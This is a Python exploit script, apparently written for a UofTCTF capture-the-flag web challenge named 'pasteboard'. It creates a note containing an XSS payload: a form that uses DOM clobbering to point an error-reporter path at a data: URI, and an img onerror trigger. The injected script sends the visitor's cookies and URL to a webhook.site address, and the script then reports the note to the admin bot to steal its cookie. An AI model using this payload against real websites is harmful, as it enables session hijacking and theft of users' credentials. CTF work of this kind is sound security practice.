import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Use data: URI with fetch - the script executes when loaded
# This should work because data: URIs execute as JavaScript
exfil_js = f"fetch('{WEBHOOK}?cookie='+encodeURIComponent(document.cookie)+'&loc='+encodeURIComponent(location.href))"
data_uri = f"data:text/javascript,{exfil_js}"

payload = f'''<form id="errorReporter">
<input name="path" value="{data_uri}">
</form>
<img src=x onerror="window.lastRenderError='x';throw Error()">'''

print("[*] Testing data: URI with fetch inside...")
print(f"[*] Payload will load: data:text/javascript,fetch(...)")
print()

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Data URI Test", "body": payload},
    allow_redirects=False
)

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    
    print(f"[+] Created: {note_url}")
    print(f"[*] You can also test manually by visiting above URL")
    print()
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    
    if report.status_code == 202:
        print(f"[+] Reported to bot!")
        print()
        print(f"[*] In 30-40 seconds, check webhook for:")
        print(f"    GET request with 'cookie' parameter")
        print(f"    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
        print()
        print(f"[*] If data: URI works, you'll see the flag in cookie parameter")
        print(f"[*] If not, we'll try a different approach")
    else:
        print(f"[-] Report failed: {report.status_code}")
else:
    print(f"[-] Failed: {resp.status_code}")